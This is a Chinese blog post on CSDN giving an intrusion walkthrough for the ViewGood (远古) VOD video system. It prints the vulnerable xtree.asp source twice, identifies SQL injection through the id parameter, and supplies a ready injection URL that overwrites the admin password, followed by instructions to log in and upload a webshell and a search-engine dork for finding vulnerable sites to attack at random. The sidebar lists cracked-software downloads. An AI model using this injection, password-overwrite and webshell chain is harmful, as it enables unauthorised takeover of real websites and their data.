最新远古VOD点播影视系统模板入侵

最新推荐文章于 2024-04-23 16:24:40 发布
最新推荐文章于 2024-04-23 16:24:40 发布
阅读量2.5k 收藏 1
点赞数
文章标签: 影视 session encoding file google 测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangmj518/article/details/2270645
版权

这里是以前的一个,大家可以看看 /Article/200708/18630.html

 

漏洞文件webmedia/common/function/xtree.asp
〈!--#include file="../dbcon.inc.asp" -->
〈%
iNode_ID = Request.QueryString("id")
if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session

("VODAdmin")) > 0 then
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" &

iNode_ID
else
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" &

iNode_ID
end if
rsData.Open szSQL,con,1,3
szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"
do while not rsData.EOF
szRetVar = szRetVar & "<TypeInfo>"
szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"
szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"
szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>"
szRetVar = szRetVar & "</TypeInfo>"
rsData.MoveNext
loop
szRetVar = szRetVar & "</Root>"
rsData.Close
Response.CharSet = "GB2312"
Response.C
Response.Expires = -1
Response.Write szRetVar
%>
〈!--#include file="../dbend.inc.asp" -->
〈!--#include file="../dbcon.inc.asp" -->
〈%
iNode_ID = Request.QueryString("id")
if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session

("VODAdmin")) > 0 then
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" &

iNode_ID
else
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" &

iNode_ID
end if
rsData.Open szSQL,con,1,3
szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"
do while not rsData.EOF
szRetVar = szRetVar & "<TypeInfo>"
szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"
szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"
szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>"
szRetVar = szRetVar & "</TypeInfo>"
rsData.MoveNext
loop
szRetVar = szRetVar & "</Root>"
rsData.Close
Response.CharSet = "GB2312"
Response.C
Response.Expires = -1
Response.Write szRetVar
%>
〈!--#include file="../dbend.inc.asp" -->
很容易看出以上存在着DB权限注入
注射地址:http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1
表段名:customer
构造函数 把admin的pass改成fuck
http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20UserPass='633f94d350db34d5'%20where%20UserName='admin'

登陆后台http://WWWW.XXXXX.COM/webmedia/admin/default.asp 直接上传大马 完事!
测试方法:在google baidu搜:    inurL:webmedia/      随便找个站都可以入侵
官方地址:http://www.viewgood.com/

 
wangmj518
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
远古VOD电影资料剧情采集工具
01-30
轻松帮你收集需要的电影资料 剧情 图片 演员
远古视频点播系统的一个注入漏洞
wangmj518的专栏
07-08 966
VIEWGOOD VOD视频点播系统 (WebVOD) 漏洞产生于文件/webmedia/oemui/user/guest.asp,访问这个页面需要注册 相关代码: szAgent = Request.ServerVariables("HTTP_USER_AGENT") aTmpInfo = Split(szAgent, " (", -1, 1) aAgentInfo
HTML5生日祝福网页制作 (粉色系列为你定制) HTML+CSS+JavaScript
HTML5学生网页设计作业成品模板
10-29 1万+
HTML5生日祝福网页制作 ❤粉色少女系列为你定制❤ HTML+CSS+JavaScript 这是程序员表白系列中的100款网站表白之一,旨在让任何人都能使用并创建自己的表白网站给心爱的人看。 此波共有100个表白网站,可以任意修改和使用,源码已上传,演示网址如下。 ????文章末尾-已经附上源码下载地址 ????作者主页-更多源码 ????七夕情人节专栏文章 作品介绍 1.网页作品简介 :基于 HTML+CSS+JavaScript 制作七夕情人节表白网页, 生日祝福, 七夕告白, 求婚, 浪漫爱情3
闪雷影视系统旗舰版全自动采集下载入库的影视下载工具
08-07
【概括介绍】 一款全自动影视下载系统。 【基本介绍】 闪雷影视是一款集全自动采集,全自动下载,全自动入库于一体的影视下载工具。可下载各种类型的电影、电视剧、音乐mv、720P高清电影。 【软件功能】 1、自带全自动资源采集功能 2、自动全自动批量下载功能 3、自带全自动入库功能 4、影片清晰度预览功能 5、视频连载功能 6、自动下载影片简介 7、自动下载影片图片 8、自动影片归类 9、自动重命名影
iOS_直播类app_HTTP Live Streaming
pre_eminent的JAVA学习园地
05-30 1万+
HTTP Live Streaming 这个是 Apple 为了提高流播效率开发的技术,特点是将流媒体切分为若干 TS 片段(比如每10秒一段),然后通过一个扩展的 m3u 列表文件将这些 TS 片段集中起来供客户端播放器接收。 这样做相比使用 RTSP 协议的好处在于,一旦切分完成,之后的分发过程完全不需要额外使用任何专门软件,普通的网络服务器即可,大大降低了 CDN 边缘服务
远古VOD5.0最新完整破解补丁
03-12
1.先安装远古5.0,顺序Database-Resource-Server. 2.设置IIS,web服务扩展的所有未知ISAPI扩展要充许,其它的按正常设置. 3.启动节目管理器,添加影片,然后点节目预览,应看到影片.如看不到,请检查IIS设置和数据库(这...
远古vod破解
11-08
远古vod破解工具
远古传说婚纱模板下载
08-25
远古传说婚纱模板下载
网吧远古VOD电影程序仿迅雷模板教程(图)
05-07
需要的朋友快下吧,这个可是我在网上找了很长时间才找到的。适合新手学习。
海燕远古VOD模板附详细安装教程
08-14
海燕远古VOD模板附详细安装教程.....
美萍VOD点播系统8.4 标准破解版+破解补丁
04-17
美萍VOD点播系统8.4 标准破解版+破解补丁 4.01M
最新绿茶网吧V5专用影视系统密码
10-14
最新绿茶网吧V5专用影视系统密码 最新绿茶网吧V5专用影视系统密码 最新绿茶网吧V5专用影视系统密码
远古VOD5.0破解版
08-30
远古VOD5.0破解版教程
ViewGood远古播放器
05-14
好用的播放器,加载速度更快,个人认为优于暴风等播放器,大家可以试一试!提供运营级vod视频点播系统,高清视频直播系统,视频培训系统,远视通增值服务平台等产品,广泛应用于电信,广电,教育,政府,企业,军事等行业.
美萍VOD点播系统破解版 带序列号
06-17
美萍VOD点播系统是一套功能强大,使用简单的VOD点播系统,其内置高效服务器引擎,采用多线程,多并发流处理技术,客户端支持WEB界面点播或者应用程序界面点播两种界面。支持目前所有流行的媒体格式,是网吧,学校机房,图书馆等场所理想的视频点播,音频点播系统
vod_play.html修改播放器页面模板
热门推荐
weixin_30648963的博客
08-15 2万+
这两条js不要丢,含在home_include.html中,否则会无法加载播放器 <script>var SitePath='{maccms:path}',SiteAid='{maccms:siteaid}',SiteTid='{maccms:sitetid}',SiteId='{maccms:siteid}';</script> <script src="{...
远古VOD5.0绿色破解版
10-22
在WIN2008中安装远古5.0破解版,也可以在为WIN2000,WIN2003下安装,绿色安装
测试理论面试题(一)
最新发布
2401_83060956的博客
04-23 1071
测试理论面试题
java语言基础面试题(二)
shiranyyds的博客
04-20 512
java语言基础面试题(二)
python在系统中执行命令
07-13
你可以使用Python的`subprocess`模块来在系统中执行命令。下面是一个简单的示例: ```python import subprocess # 执行命令,将输出保存到变量中 output = subprocess.check_output("ls", shell=True) # 打印输出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值